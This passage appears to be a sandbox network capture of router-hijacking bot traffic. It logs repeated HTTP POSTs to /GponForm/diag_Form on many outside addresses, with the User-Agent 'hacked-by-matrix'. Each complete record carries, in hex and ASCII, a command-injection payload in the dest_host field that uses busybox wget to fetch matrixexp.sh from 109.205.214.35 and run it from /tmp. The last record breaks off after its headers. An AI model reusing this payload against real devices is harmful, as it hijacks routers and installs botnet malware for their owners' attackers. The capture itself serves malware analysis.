                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        206192.168.2.13496885.16.212.192443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452378035 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        207192.168.2.13584245.6.142.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452380896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        208192.168.2.1346952109.43.69.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452403069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        209192.168.2.1359850109.231.158.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452403069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        210192.168.2.133505042.221.229.187443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452476978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        211192.168.2.1348428212.208.21.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452480078 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        212192.168.2.13426385.102.111.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452502966 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        213192.168.2.1354748118.154.165.221443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452510118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        214192.168.2.13609985.71.202.100443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459706068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        215192.168.2.1357146109.193.190.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459739923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        216192.168.2.135323642.63.174.250443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459755898 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        217192.168.2.1347490109.197.64.112443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459764957 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        218192.168.2.13418085.128.71.200443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459778070 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        219192.168.2.134300242.125.124.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459780931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        220192.168.2.13594305.179.25.74443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459811926 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        221192.168.2.1351572109.186.196.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459814072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        222192.168.2.133540242.186.151.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459867001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        223192.168.2.134707442.222.119.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459888935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        224192.168.2.1347954109.229.184.241443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459913015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        225192.168.2.1343222212.98.73.44443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459947109 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        226192.168.2.13439105.225.245.148443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.459992886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        227192.168.2.1338192109.184.110.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460011959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        228192.168.2.1335914109.32.201.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460033894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
